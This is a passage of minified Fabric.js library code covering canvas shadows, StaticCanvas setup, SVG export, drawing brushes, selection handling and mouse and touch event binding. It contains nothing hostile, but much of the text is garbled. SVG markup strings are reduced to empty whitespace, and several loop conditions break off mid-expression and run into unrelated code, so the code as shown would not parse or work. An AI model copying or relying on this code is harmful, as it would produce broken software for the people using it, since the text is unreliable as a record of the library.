y=_.trim(),A=C.Shadow.reOffsetsAndBlur.exec(y)||[];return{color:(y.replace(C.Shadow.reOffsetsAndBlur,"")||"rgb(0,0,0)").trim(),offsetX:parseFloat(A[1],10)||0,offsetY:parseFloat(A[2],10)||0,blur:parseFloat(A[3],10)||0}},toString:function(){return[this.offsetX,this.offsetY,this.blur,this.color].join("px ")},toSVG:function(_){var y=40,A=40,p=C.Object.NUM_FRACTION_DIGITS,D=C.util.rotateVector({x:this.offsetX,y:this.offsetY},C.util.degreesToRadians(-_.angle)),x=new C.Color(this.color);return _.width&&_.height&&(y=100*b((Math.abs(D.x)+this.blur)/_.width,p)+20,A=100*b((Math.abs(D.y)+this.blur)/_.height,p)+20),_.flipX&&(D.x*=-1),_.flipY&&(D.y*=-1),'\n\t\n\t\n\t\n\t\n\t\n\t\t\n\t\t\n\t\n\n'},toObject:function(){if(this.includeDefaultValues)return{color:this.color,blur:this.blur,offsetX:this.offsetX,offsetY:this.offsetY,affectStroke:this.affectStroke,nonScaling:this.nonScaling};var _={},y=C.Shadow.prototype;return["color","blur","offsetX","offsetY","affectStroke","nonScaling"].forEach(function(A){this[A]!==y[A]&&(_[A]=this[A])},this),_}}),C.Shadow.reOffsetsAndBlur=/(?:\s|^)(-?\d+(?:\.\d*)?(?:px)?(?:\s?|$))?(-?\d+(?:\.\d*)?(?:px)?(?:\s?|$))?(\d+(?:\.\d*)?(?:px)?)?(?:\s?|$)(?:$|\s)/)}(we),function(){"use strict";if(j.StaticCanvas)j.warn("fabric.StaticCanvas is already defined.");else{var E=j.util.object.extend,C=j.util.getElementOffset,b=j.util.removeFromArray,_=j.util.toFixed,y=j.util.transformPoint,A=j.util.invertTransform,p=j.util.getNodeCanvas,D=j.util.createCanvasElement,w=new Error("Could not initialize `canvas` element");j.StaticCanvas=j.util.createClass(j.CommonMethods,{initialize:function(x,S){S||(S={}),this.renderAndResetBound=this.renderAndReset.bind(this),this.requestRenderAllBound=this.requestRenderAll.bind(this),this._initStatic(x,S)},backgroundColor:"",backgroundImage:null,overlayColor:"",overlayImage:null,includeDefaultValues:!0,stateful:!1,renderOnAddRemove:!0,controlsAboveOverlay:!1,allowTouchScrolling:!1,imageSmoothingEnabled:!0,viewportTransform:j.iMatrix.concat(),backgroundVpt:!0,overlayVpt:!0,enableRetinaScaling:!0,vptCoords:{},skipOffscreen:!0,clipPath:void 0,_initStatic:function(x,S){var O=this.requestRenderAllBound;this._objects=[],this._createLowerCanvas(x),this._initOptions(S),this.interactive||this._initRetinaScaling(),S.overlayImage&&this.setOverlayImage(S.overlayImage,O),S.backgroundImage&&this.setBackgroundImage(S.backgroundImage,O),S.backgroundColor&&this.setBackgroundColor(S.backgroundColor,O),S.overlayColor&&this.setOverlayColor(S.overlayColor,O),this.calcOffset()},_isRetinaScaling:function(){return j.devicePixelRatio>1&&this.enableRetinaScaling},getRetinaScaling:function(){return this._isRetinaScaling()?Math.max(1,j.devicePixelRatio):1},_initRetinaScaling:function(){if(this._isRetinaScaling()){var x=j.devicePixelRatio;this.__initRetinaScaling(x,this.lowerCanvasEl,this.contextContainer),this.upperCanvasEl&&this.__initRetinaScaling(x,this.upperCanvasEl,this.contextTop)}},__initRetinaScaling:function(x,S,O){S.setAttribute("width",this.width*x),S.setAttribute("height",this.height*x),O.scale(x,x)},calcOffset:function(){return this._offset=C(this.lowerCanvasEl),this},setOverlayImage:function(x,S,O){return this.__setBgOverlayImage("overlayImage",x,S,O)},setBackgroundImage:function(x,S,O){return this.__setBgOverlayImage("backgroundImage",x,S,O)},setOverlayColor:function(x,S){return this.__setBgOverlayColor("overlayColor",x,S)},setBackgroundColor:function(x,S){return this.__setBgOverlayColor("backgroundColor",x,S)},__setBgOverlayImage:function(x,S,O,B){return"string"==typeof S?j.util.loadImage(S,function(K,ee){if(K){var se=new j.Image(K,B);this[x]=se,se.canvas=this}O&&O(K,ee)},this,B&&B.crossOrigin):(B&&S.setOptions(B),this[x]=S,S&&(S.canvas=this),O&&O(S,!1)),this},__setBgOverlayColor:function(x,S,O){return this[x]=S,this._initGradient(S,x),this._initPattern(S,x,O),this},_createCanvasElement:function(){var x=D();if(!x||(x.style||(x.style={}),void 0===x.getContext))throw w;return x},_initOptions:function(x){var S=this.lowerCanvasEl;this._setOptions(x),this.width=this.width||parseInt(S.width,10)||0,this.height=this.height||parseInt(S.height,10)||0,this.lowerCanvasEl.style&&(S.width=this.width,S.height=this.height,S.style.width=this.width+"px",S.style.height=this.height+"px",this.viewportTransform=this.viewportTransform.slice())},_createLowerCanvas:function(x){this.lowerCanvasEl=x&&x.getContext?x:j.util.getById(x)||this._createCanvasElement(),j.util.addClass(this.lowerCanvasEl,"lower-canvas"),this._originalCanvasStyle=this.lowerCanvasEl.style,this.interactive&&this._applyCanvasStyle(this.lowerCanvasEl),this.contextContainer=this.lowerCanvasEl.getContext("2d")},getWidth:function(){return this.width},getHeight:function(){return this.height},setWidth:function(x,S){return this.setDimensions({width:x},S)},setHeight:function(x,S){return this.setDimensions({height:x},S)},setDimensions:function(x,S){var O;for(var B in S=S||{},x)O=x[B],S.cssOnly||(this._setBackstoreDimension(B,x[B]),O+="px",this.hasLostContext=!0),S.backstoreOnly||this._setCssDimension(B,O);return this._isCurrentlyDrawing&&this.freeDrawingBrush&&this.freeDrawingBrush._setBrushStyles(this.contextTop),this._initRetinaScaling(),this.calcOffset(),S.cssOnly||this.requestRenderAll(),this},_setBackstoreDimension:function(x,S){return this.lowerCanvasEl[x]=S,this.upperCanvasEl&&(this.upperCanvasEl[x]=S),this.cacheCanvasEl&&(this.cacheCanvasEl[x]=S),this[x]=S,this},_setCssDimension:function(x,S){return this.lowerCanvasEl.style[x]=S,this.upperCanvasEl&&(this.upperCanvasEl.style[x]=S),this.wrapperEl&&(this.wrapperEl.style[x]=S),this},getZoom:function(){return this.viewportTransform[0]},setViewportTransform:function(x){var K,ee,se,S=this._activeObject,O=this.backgroundImage,B=this.overlayImage;for(this.viewportTransform=x,ee=0,se=this._objects.length;ee\n'),this._setSVGBgOverlayColor(O,"background"),this._setSVGBgOverlayImage(O,"backgroundImage",S),this._setSVGObjects(O,S),this.clipPath&&O.push("\n"),this._setSVGBgOverlayColor(O,"overlay"),this._setSVGBgOverlayImage(O,"overlayImage",S),O.push(""),O.join("")},_setSVGPreamble:function(x,S){S.suppressPreamble||x.push('\n','\n')},_setSVGHeader:function(x,S){var K,O=S.width||this.width,B=S.height||this.height,ee='viewBox="0 0 '+this.width+" "+this.height+'" ',se=j.Object.NUM_FRACTION_DIGITS;S.viewBox?ee='viewBox="'+S.viewBox.x+" "+S.viewBox.y+" "+S.viewBox.width+" "+S.viewBox.height+'" ':this.svgViewportTransformation&&(ee='viewBox="'+_(-(K=this.viewportTransform)[4]/K[0],se)+" "+_(-K[5]/K[3],se)+" "+_(this.width/K[0],se)+" "+_(this.height/K[3],se)+'" '),x.push("\n',"Created with Fabric.js ",j.version,"\n","\n",this.createSVGFontFacesMarkup(),this.createSVGRefElementsMarkup(),this.createSVGClipPathMarkup(S),"\n")},createSVGClipPathMarkup:function(x){var S=this.clipPath;return S?(S.clipPathId="CLIPPATH_"+j.Object.__uid++,'\n'+this.clipPath.toClipPathSVG(x.reviver)+"\n"):""},createSVGRefElementsMarkup:function(){var x=this;return["background","overlay"].map(function(O){var B=x[O+"Color"];if(B&&B.toLive){var K=x[O+"Vpt"],ee=x.viewportTransform;return B.toSVG({width:x.width/(K?ee[0]:1),height:x.height/(K?ee[3]:1)},{additionalTransform:K?j.util.matrixToSVG(ee):""})}}).join("")},createSVGFontFacesMarkup:function(){var O,B,K,ee,se,le,ye,z,x="",S={},l=j.fontPaths,f=[];for(this._objects.forEach(function M(P){f.push(P),P._objects&&P._objects.forEach(M)}),ye=0,z=f.length;ye',"\n",x,"","\n"].join("")),x},_setSVGObjects:function(x,S){var O,B,K,ee=this._objects;for(B=0,K=ee.length;B\n")}else x.push('\n")},sendToBack:function(x){if(!x)return this;var O,B,K,S=this._activeObject;if(x===S&&"activeSelection"===x.type)for(O=(K=S._objects).length;O--;)b(this._objects,B=K[O]),this._objects.unshift(B);else b(this._objects,x),this._objects.unshift(x);return this.renderOnAddRemove&&this.requestRenderAll(),this},bringToFront:function(x){if(!x)return this;var O,B,K,S=this._activeObject;if(x===S&&"activeSelection"===x.type)for(K=S._objects,O=0;O0+le&&(se=ee-1,b(this._objects,K),this._objects.splice(se,0,K)),le++;else 0!==(ee=this._objects.indexOf(x))&&(se=this._findNewLowerIndex(x,ee,S),b(this._objects,x),this._objects.splice(se,0,x));return this.renderOnAddRemove&&this.requestRenderAll(),this},_findNewLowerIndex:function(x,S,O){var B,K;if(O){for(B=S,K=S-1;K>=0;--K)if(x.intersectsWithObject(this._objects[K])||x.isContainedWithinObject(this._objects[K])||this._objects[K].isContainedWithinObject(x)){B=K;break}}else B=S-1;return B},bringForward:function(x,S){if(!x)return this;var B,K,ee,se,ve,O=this._activeObject,le=0;if(x===O&&"activeSelection"===x.type)for(B=(ve=O._objects).length;B--;)(ee=this._objects.indexOf(K=ve[B]))"}}),E(j.StaticCanvas.prototype,j.Observable),E(j.StaticCanvas.prototype,j.Collection),E(j.StaticCanvas.prototype,j.DataURLExporter),E(j.StaticCanvas,{EMPTY_JSON:'{"objects": [], "background": "white"}',supports:function(x){var S=D();if(!S||!S.getContext)return null;var O=S.getContext("2d");return O&&"setLineDash"===x?void 0!==O.setLineDash:null}}),j.StaticCanvas.prototype.toJSON=j.StaticCanvas.prototype.toObject,j.isLikelyNode&&(j.StaticCanvas.prototype.createPNGStream=function(){var x=p(this.lowerCanvasEl);return x&&x.createPNGStream()},j.StaticCanvas.prototype.createJPEGStream=function(x){var S=p(this.lowerCanvasEl);return S&&S.createJPEGStream(x)})}}(),j.BaseBrush=j.util.createClass({color:"rgb(0, 0, 0)",width:1,shadow:null,strokeLineCap:"round",strokeLineJoin:"round",strokeMiterLimit:10,strokeDashArray:null,limitedToCanvasSize:!1,_setBrushStyles:function(E){E.strokeStyle=this.color,E.lineWidth=this.width,E.lineCap=this.strokeLineCap,E.miterLimit=this.strokeMiterLimit,E.lineJoin=this.strokeLineJoin,E.setLineDash(this.strokeDashArray||[])},_saveAndTransform:function(E){var C=this.canvas.viewportTransform;E.save(),E.transform(C[0],C[1],C[2],C[3],C[4],C[5])},_setShadow:function(){if(this.shadow){var E=this.canvas,C=this.shadow,b=E.contextTop,_=E.getZoom();E&&E._isRetinaScaling()&&(_*=j.devicePixelRatio),b.shadowColor=C.color,b.shadowBlur=C.blur*_,b.shadowOffsetX=C.offsetX*_,b.shadowOffsetY=C.offsetY*_}},needsFullRender:function(){return new j.Color(this.color).getAlpha()<1||!!this.shadow},_resetShadow:function(){var E=this.canvas.contextTop;E.shadowColor="",E.shadowBlur=E.shadowOffsetX=E.shadowOffsetY=0},_isOutSideCanvas:function(E){return E.x<0||E.x>this.canvas.getWidth()||E.y<0||E.y>this.canvas.getHeight()}}),j.PencilBrush=j.util.createClass(j.BaseBrush,{decimate:.4,drawStraightLine:!1,straightLineKey:"shiftKey",initialize:function(E){this.canvas=E,this._points=[]},needsFullRender:function(){return this.callSuper("needsFullRender")||this._hasStraightLine},_drawSegment:function(E,C,b){var _=C.midPointFrom(b);return E.quadraticCurveTo(C.x,C.y,_.x,_.y),_},onMouseDown:function(E,C){!this.canvas._isMainEvent(C.e)||(this.drawStraightLine=C.e[this.straightLineKey],this._prepareForDrawing(E),this._captureDrawingPath(E),this._render())},onMouseMove:function(E,C){if(this.canvas._isMainEvent(C.e)&&(this.drawStraightLine=C.e[this.straightLineKey],(!0!==this.limitedToCanvasSize||!this._isOutSideCanvas(E))&&this._captureDrawingPath(E)&&this._points.length>1))if(this.needsFullRender())this.canvas.clearContext(this.canvas.contextTop),this._render();else{var b=this._points,_=b.length,y=this.canvas.contextTop;this._saveAndTransform(y),this.oldEnd&&(y.beginPath(),y.moveTo(this.oldEnd.x,this.oldEnd.y)),this.oldEnd=this._drawSegment(y,b[_-2],b[_-1],!0),y.stroke(),y.restore()}},onMouseUp:function(E){return!this.canvas._isMainEvent(E.e)||(this.drawStraightLine=!1,this.oldEnd=void 0,this._finalizeAndAddPath(),!1)},_prepareForDrawing:function(E){var C=new j.Point(E.x,E.y);this._reset(),this._addPoint(C),this.canvas.contextTop.moveTo(C.x,C.y)},_addPoint:function(E){return!(this._points.length>1&&E.eq(this._points[this._points.length-1])||(this.drawStraightLine&&this._points.length>1&&(this._hasStraightLine=!0,this._points.pop()),this._points.push(E),0))},_reset:function(){this._points=[],this._setBrushStyles(this.canvas.contextTop),this._setShadow(),this._hasStraightLine=!1},_captureDrawingPath:function(E){var C=new j.Point(E.x,E.y);return this._addPoint(C)},_render:function(E){var C,b,_=this._points[0],y=this._points[1];if(this._saveAndTransform(E=E||this.canvas.contextTop),E.beginPath(),2===this._points.length&&_.x===y.x&&_.y===y.y){var A=this.width/1e3;_=new j.Point(_.x,_.y),y=new j.Point(y.x,y.y),_.x-=A,y.x+=A}for(E.moveTo(_.x,_.y),C=1,b=this._points.length;C=_&&D.push(p=E[y]);return D.push(E[A]),D},_finalizeAndAddPath:function(){this.canvas.contextTop.closePath(),this.decimate&&(this._points=this.decimatePoints(this._points,this.decimate));var C=this.convertPointsToSVGPath(this._points);if(this._isEmptySVGPath(C))this.canvas.requestRenderAll();else{var b=this.createPath(C);this.canvas.clearContext(this.canvas.contextTop),this.canvas.fire("before:path:created",{path:b}),this.canvas.add(b),this.canvas.requestRenderAll(),b.setCoords(),this._resetShadow(),this.canvas.fire("path:created",{path:b})}}}),j.CircleBrush=j.util.createClass(j.BaseBrush,{width:10,initialize:function(E){this.canvas=E,this.points=[]},drawDot:function(E){var C=this.addPoint(E),b=this.canvas.contextTop;this._saveAndTransform(b),this.dot(b,C),b.restore()},dot:function(E,C){E.fillStyle=C.fill,E.beginPath(),E.arc(C.x,C.y,C.radius,0,2*Math.PI,!1),E.closePath(),E.fill()},onMouseDown:function(E){this.points.length=0,this.canvas.clearContext(this.canvas.contextTop),this._setShadow(),this.drawDot(E)},_render:function(){var C,b,E=this.canvas.contextTop,_=this.points;for(this._saveAndTransform(E),C=0,b=_.length;C0&&!this.preserveObjectStacking){p=[],D=[];for(var w=0,x=this._objects.length;w1&&(this._activeObject._objects=D),p.push.apply(p,D)}else p=this._objects;return p},renderAll:function(){return this.contextTopDirty&&!this._groupSelector&&!this.isDrawingMode&&(this.clearContext(this.contextTop),this.contextTopDirty=!1),this.hasLostContext&&(this.renderTopLayer(this.contextTop),this.hasLostContext=!1),this.renderCanvas(this.contextContainer,this._chooseObjectsToRender()),this},renderTopLayer:function(y){y.save(),this.isDrawingMode&&this._isCurrentlyDrawing&&(this.freeDrawingBrush&&this.freeDrawingBrush._render(),this.contextTopDirty=!0),this.selection&&this._groupSelector&&(this._drawSelection(y),this.contextTopDirty=!0),y.restore()},renderTop:function(){var y=this.contextTop;return this.clearContext(y),this.renderTopLayer(y),this.fire("after:render"),this},_normalizePointer:function(y,A){var p=y.calcTransformMatrix(),D=j.util.invertTransform(p),w=this.restorePointerVpt(A);return j.util.transformPoint(w,D)},isTargetTransparent:function(y,A,p){if(y.shouldCache()&&y._cacheCanvas&&y!==this._activeObject){var D=this._normalizePointer(y,{x:A,y:p}),w=Math.max(y.cacheTranslationX+D.x*y.zoomX,0),x=Math.max(y.cacheTranslationY+D.y*y.zoomY,0);return j.util.isTransparent(y._cacheContext,Math.round(w),Math.round(x),this.targetFindTolerance)}var S=this.contextCache,O=y.selectionBackgroundColor,B=this.viewportTransform;return y.selectionBackgroundColor="",this.clearContext(S),S.save(),S.transform(B[0],B[1],B[2],B[3],B[4],B[5]),y.render(S),S.restore(),y.selectionBackgroundColor=O,j.util.isTransparent(S,A,p,this.targetFindTolerance)},_isSelectionKeyPressed:function(y){return Array.isArray(this.selectionKey)?!!this.selectionKey.find(function(p){return!0===y[p]}):y[this.selectionKey]},_shouldClearSelection:function(y,A){var p=this.getActiveObjects(),D=this._activeObject;return!A||A&&D&&p.length>1&&-1===p.indexOf(A)&&D!==A&&!this._isSelectionKeyPressed(y)||A&&!A.evented||A&&!A.selectable&&D&&D!==A},_shouldCenterTransform:function(y,A,p){var D;if(y)return"scale"===A||"scaleX"===A||"scaleY"===A||"resizing"===A?D=this.centeredScaling||y.centeredScaling:"rotate"===A&&(D=this.centeredRotation||y.centeredRotation),D?!p:p},_getOriginFromCorner:function(y,A){var p={x:y.originX,y:y.originY};return"ml"===A||"tl"===A||"bl"===A?p.x="right":("mr"===A||"tr"===A||"br"===A)&&(p.x="left"),"tl"===A||"mt"===A||"tr"===A?p.y="bottom":("bl"===A||"mb"===A||"br"===A)&&(p.y="top"),p},_getActionFromCorner:function(y,A,p,D){if(!A||!y)return"drag";var w=D.controls[A];return w.getActionName(p,w,D)},_setupCurrentTransform:function(y,A,p){if(A){var D=this.getPointer(y),w=A.__corner,x=A.controls[w],S=p&&w?x.getActionHandler(y,A,x):j.controlsUtils.dragHandler,O=this._getActionFromCorner(p,w,y,A),B=this._getOriginFromCorner(A,w),K=y[this.centeredKey],ee={target:A,action:O,actionHandler:S,corner:w,scaleX:A.scaleX,scaleY:A.scaleY,skewX:A.skewX,skewY:A.skewY,offsetX:D.x-A.left,offsetY:D.y-A.top,originX:B.x,originY:B.y,ex:D.x,ey:D.y,lastX:D.x,lastY:D.y,theta:C(A.angle),width:A.width*A.scaleX,shiftKey:y.shiftKey,altKey:K,original:j.util.saveObjectTransform(A)};this._shouldCenterTransform(A,O,K)&&(ee.originX="center",ee.originY="center"),ee.original.originX=B.x,ee.original.originY=B.y,this._currentTransform=ee,this._beforeTransform(y)}},setCursor:function(y){this.upperCanvasEl.style.cursor=y},_drawSelection:function(y){var A=this._groupSelector,p=new j.Point(A.ex,A.ey),D=j.util.transformPoint(p,this.viewportTransform),w=new j.Point(A.ex+A.left,A.ey+A.top),x=j.util.transformPoint(w,this.viewportTransform),S=Math.min(D.x,x.x),O=Math.min(D.y,x.y),B=Math.max(D.x,x.x),K=Math.max(D.y,x.y),ee=this.selectionLineWidth/2;this.selectionColor&&(y.fillStyle=this.selectionColor,y.fillRect(S,O,B-S,K-O)),this.selectionLineWidth&&this.selectionBorderColor&&(y.lineWidth=this.selectionLineWidth,y.strokeStyle=this.selectionBorderColor,S+=ee,O+=ee,B-=ee,K-=ee,j.Object.prototype._setLineDash.call(this,y,this.selectionDashArray),y.strokeRect(S,O,B-S,K-O))},findTarget:function(y,A){if(!this.skipTargetFind){var S,O,D=this.getPointer(y,!0),w=this._activeObject,x=this.getActiveObjects(),B=b(y),K=x.length>1&&!A||1===x.length;if(this.targets=[],K&&w._findTargetCorner(D,B)||x.length>1&&!A&&w===this._searchPossibleTargets([w],D))return w;if(1===x.length&&w===this._searchPossibleTargets([w],D)){if(!this.preserveObjectStacking)return w;S=w,O=this.targets,this.targets=[]}var ee=this._searchPossibleTargets(this._objects,D);return y[this.altSelectionKey]&&ee&&S&&ee!==S&&(ee=S,this.targets=O),ee}},_checkTarget:function(y,A,p){if(A&&A.visible&&A.evented&&A.containsPoint(y)){if(!this.perPixelTargetFind&&!A.perPixelTargetFind||A.isEditing)return!0;if(!this.isTargetTransparent(A,p.x,p.y))return!0}},_searchPossibleTargets:function(y,A){for(var p,w,D=y.length;D--;){var x=y[D],S=x.group?this._normalizePointer(x.group,A):A;if(this._checkTarget(S,x,A)){(p=y[D]).subTargetCheck&&p instanceof j.Group&&(w=this._searchPossibleTargets(p._objects,A))&&this.targets.push(w);break}}return p},restorePointerVpt:function(y){return j.util.transformPoint(y,j.util.invertTransform(this.viewportTransform))},getPointer:function(y,A){if(this._absolutePointer&&!A)return this._absolutePointer;if(this._pointer&&A)return this._pointer;var O,p=E(y),D=this.upperCanvasEl,w=D.getBoundingClientRect(),x=w.width||0,S=w.height||0;(!x||!S)&&("top"in w&&"bottom"in w&&(S=Math.abs(w.top-w.bottom)),"right"in w&&"left"in w&&(x=Math.abs(w.right-w.left))),this.calcOffset(),p.x=p.x-this._offset.left,p.y=p.y-this._offset.top,A||(p=this.restorePointerVpt(p));var B=this.getRetinaScaling();return 1!==B&&(p.x/=B,p.y/=B),{x:p.x*(O=0===x||0===S?{width:1,height:1}:{width:D.width/x,height:D.height/S}).width,y:p.y*O.height}},_createUpperCanvas:function(){var y=this.lowerCanvasEl.className.replace(/\s*lower-canvas\s*/,""),A=this.lowerCanvasEl,p=this.upperCanvasEl;p?p.className="":(p=this._createCanvasElement(),this.upperCanvasEl=p),j.util.addClass(p,"upper-canvas "+y),this.wrapperEl.appendChild(p),this._copyCanvasStyle(A,p),this._applyCanvasStyle(p),this.contextTop=p.getContext("2d")},getTopContext:function(){return this.contextTop},_createCacheCanvas:function(){this.cacheCanvasEl=this._createCanvasElement(),this.cacheCanvasEl.setAttribute("width",this.width),this.cacheCanvasEl.setAttribute("height",this.height),this.contextCache=this.cacheCanvasEl.getContext("2d")},_initWrapperElement:function(){this.wrapperEl=j.util.wrapElement(this.lowerCanvasEl,"div",{class:this.containerClass}),j.util.setStyle(this.wrapperEl,{width:this.width+"px",height:this.height+"px",position:"relative"}),j.util.makeElementUnselectable(this.wrapperEl)},_applyCanvasStyle:function(y){var A=this.width||y.width,p=this.height||y.height;j.util.setStyle(y,{position:"absolute",width:A+"px",height:p+"px",left:0,top:0,"touch-action":this.allowTouchScrolling?"manipulation":"none","-ms-touch-action":this.allowTouchScrolling?"manipulation":"none"}),y.width=A,y.height=p,j.util.makeElementUnselectable(y)},_copyCanvasStyle:function(y,A){A.style.cssText=y.style.cssText},getSelectionContext:function(){return this.contextTop},getSelectionElement:function(){return this.upperCanvasEl},getActiveObject:function(){return this._activeObject},getActiveObjects:function(){var y=this._activeObject;return y?"activeSelection"===y.type&&y._objects?y._objects.slice(0):[y]:[]},_onObjectRemoved:function(y){y===this._activeObject&&(this.fire("before:selection:cleared",{target:y}),this._discardActiveObject(),this.fire("selection:cleared",{target:y}),y.fire("deselected")),y===this._hoveredTarget&&(this._hoveredTarget=null,this._hoveredTargets=[]),this.callSuper("_onObjectRemoved",y)},_fireSelectionEvents:function(y,A){var p=!1,D=this.getActiveObjects(),w=[],x=[];y.forEach(function(S){-1===D.indexOf(S)&&(p=!0,S.fire("deselected",{e:A,target:S}),x.push(S))}),D.forEach(function(S){-1===y.indexOf(S)&&(p=!0,S.fire("selected",{e:A,target:S}),w.push(S))}),y.length>0&&D.length>0?p&&this.fire("selection:updated",{e:A,selected:w,deselected:x}):D.length>0?this.fire("selection:created",{e:A,selected:w}):y.length>0&&this.fire("selection:cleared",{e:A,deselected:x})},setActiveObject:function(y,A){var p=this.getActiveObjects();return this._setActiveObject(y,A),this._fireSelectionEvents(p,A),this},_setActiveObject:function(y,A){return!(this._activeObject===y||!this._discardActiveObject(A,y)||y.onSelect({e:A})||(this._activeObject=y,0))},_discardActiveObject:function(y,A){var p=this._activeObject;if(p){if(p.onDeselect({e:y,object:A}))return!1;this._activeObject=null}return!0},discardActiveObject:function(y){var A=this.getActiveObjects(),p=this.getActiveObject();return A.length&&this.fire("before:selection:cleared",{target:p,e:y}),this._discardActiveObject(y),this._fireSelectionEvents(A,y),this},dispose:function(){var y=this.wrapperEl;return this.removeListeners(),y.removeChild(this.upperCanvasEl),y.removeChild(this.lowerCanvasEl),this.contextCache=null,this.contextTop=null,["upperCanvasEl","cacheCanvasEl"].forEach(function(A){j.util.cleanUpJsdomNode(this[A]),this[A]=void 0}.bind(this)),y.parentNode&&y.parentNode.replaceChild(this.lowerCanvasEl,this.wrapperEl),delete this.wrapperEl,j.StaticCanvas.prototype.dispose.call(this),this},clear:function(){return this.discardActiveObject(),this.clearContext(this.contextTop),this.callSuper("clear")},drawControls:function(y){var A=this._activeObject;A&&A._renderControls(y)},_toObject:function(y,A,p){var D=this._realizeGroupTransformOnObject(y),w=this.callSuper("_toObject",y,A,p);return this._unwindGroupTransformOnObject(y,D),w},_realizeGroupTransformOnObject:function(y){if(y.group&&"activeSelection"===y.group.type&&this._activeObject===y.group){var p={};return["angle","flipX","flipY","left","scaleX","scaleY","skewX","skewY","top"].forEach(function(D){p[D]=y[D]}),j.util.addTransformToObject(y,this._activeObject.calcOwnMatrix()),p}return null},_unwindGroupTransformOnObject:function(y,A){A&&y.set(A)},_setSVGObject:function(y,A,p){var D=this._realizeGroupTransformOnObject(A);this.callSuper("_setSVGObject",y,A,p),this._unwindGroupTransformOnObject(A,D)},setViewportTransform:function(y){this.renderOnAddRemove&&this._activeObject&&this._activeObject.isEditing&&this._activeObject.clearContextTop(),j.StaticCanvas.prototype.setViewportTransform.call(this,y)}}),j.StaticCanvas)"prototype"!==_&&(j.Canvas[_]=j.StaticCanvas[_])}(),function(){var E=j.util.addListener,C=j.util.removeListener,A={passive:!1};function p(D,w){return D.button&&D.button===w-1}j.util.object.extend(j.Canvas.prototype,{mainTouchId:null,_initEventListeners:function(){this.removeListeners(),this._bindEvents(),this.addOrRemove(E,"add")},_getEventPrefix:function(){return this.enablePointerEvents?"pointer":"mouse"},addOrRemove:function(D,w){var x=this.upperCanvasEl,S=this._getEventPrefix();D(j.window,"resize",this._onResize),D(x,S+"down",this._onMouseDown),D(x,S+"move",this._onMouseMove,A),D(x,S+"out",this._onMouseOut),D(x,S+"enter",this._onMouseEnter),D(x,"wheel",this._onMouseWheel),D(x,"contextmenu",this._onContextMenu),D(x,"dblclick",this._onDoubleClick),D(x,"dragover",this._onDragOver),D(x,"dragenter",this._onDragEnter),D(x,"dragleave",this._onDragLeave),D(x,"drop",this._onDrop),this.enablePointerEvents||D(x,"touchstart",this._onTouchStart,A),"undefined"!=typeof eventjs&&w in eventjs&&(eventjs[w](x,"gesture",this._onGesture),eventjs[w](x,"drag",this._onDrag),eventjs[w](x,"orientation",this._onOrientationChange),eventjs[w](x,"shake",this._onShake),eventjs[w](x,"longpress",this._onLongPress))},removeListeners:function(){this.addOrRemove(C,"remove");var D=this._getEventPrefix();C(j.document,D+"up",this._onMouseUp),C(j.document,"touchend",this._onTouchEnd,A),C(j.document,D+"move",this._onMouseMove,A),C(j.document,"touchmove",this._onMouseMove,A)},_bindEvents:function(){this.eventsBound||(this._onMouseDown=this._onMouseDown.bind(this),this._onTouchStart=this._onTouchStart.bind(this),this._onMouseMove=this._onMouseMove.bind(this),this._onMouseUp=this._onMouseUp.bind(this),this._onTouchEnd=this._onTouchEnd.bind(this),this._onResize=this._onResize.bind(this),this._onGesture=this._onGesture.bind(this),this._onDrag=this._onDrag.bind(this),this._onShake=this._onShake.bind(this),this._onLongPress=this._onLongPress.bind(this),this._onOrientationChange=this._onOrientationChange.bind(this),this._onMouseWheel=this._onMouseWheel.bind(this),this._onMouseOut=this._onMouseOut.bind(this),this._onMouseEnter=this._onMouseEnter.bind(this),this._onContextMenu=this._onContextMenu.bind(this),this._onDoubleClick=this._onDoubleClick.bind(this),this._onDragOver=this._onDragOver.bind(this),this._onDragEnter=this._simpleEventHandler.bind(this,"dragenter"),this._onDragLeave=this._simpleEventHandler.bind(this,"dragleave"),this._onDrop=this._onDrop.bind(this),this.eventsBound=!0)},_onGesture:function(D,w){this.__onTransformGesture&&this.__onTransformGesture(D,w)},_onDrag:function(D,w){this.__onDrag&&this.__onDrag(D,w)},_onMouseWheel:function(D){this.__onMouseWheel(D)},_onMouseOut:function(D){var w=this._hoveredTarget;this.fire("mouse:out",{target:w,e:D}),this._hoveredTarget=null,w&&w.fire("mouseout",{e:D});var x=this;this._hoveredTargets.forEach(function(S){x.fire("mouse:out",{target:w,e:D}),S&&w.fire("mouseout",{e:D})}),this._hoveredTargets=[]},_onMouseEnter:function(D){!this._currentTransform&&!this.findTarget(D)&&(this.fire("mouse:over",{target:null,e:D}),this._hoveredTarget=null,this._hoveredTargets=[])},_onOrientationChange:function(D,w){this.__onOrientationChange&&this.__onOrientationChange(D,w)},_onShake:function(D,w){this.__onShake&&this.__onShake(D,w)},_onLongPress:function(D,w){this.__onLongPress&&this.__onLongPress(D,w)},_onDragOver:function(D){D.preventDefault();var w=this._simpleEventHandler("dragover",D);this._fireEnterLeaveEvents(w,D)},_onDrop:function(D){return this._simpleEventHandler("drop:before",D),this._simpleEventHandler("drop",D)},_onContextMenu:function(D){return this.stopContextMenu&&(D.stopPropagation(),D.preventDefault()),!1},_onDoubleClick:function(D){this._cacheTransformEventData(D),this._handleEvent(D,"dblclick"),this._resetTransformEventData(D)},getPointerId:function(D){var w=D.changedTouches;return w?w[0]&&w[0].identifier:this.enablePointerEvents?D.pointerId:-1},_isMainEvent:function(D){return!0===D.isPrimary||!1!==D.isPrimary&&("touchend"===D.type&&0===D.touches.length||!D.changedTouches||D.changedTouches[0].identifier===this.mainTouchId)},_onTouchStart:function(D){D.preventDefault(),null===this.mainTouchId&&(this.mainTouchId=this.getPointerId(D)),this.__onMouseDown(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();E(j.document,"touchend",this._onTouchEnd,A),E(j.document,"touchmove",this._onMouseMove,A),C(w,x+"down",this._onMouseDown)},_onMouseDown:function(D){this.__onMouseDown(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();C(w,x+"move",this._onMouseMove,A),E(j.document,x+"up",this._onMouseUp),E(j.document,x+"move",this._onMouseMove,A)},_onTouchEnd:function(D){if(!(D.touches.length>0)){this.__onMouseUp(D),this._resetTransformEventData(),this.mainTouchId=null;var w=this._getEventPrefix();C(j.document,"touchend",this._onTouchEnd,A),C(j.document,"touchmove",this._onMouseMove,A);var 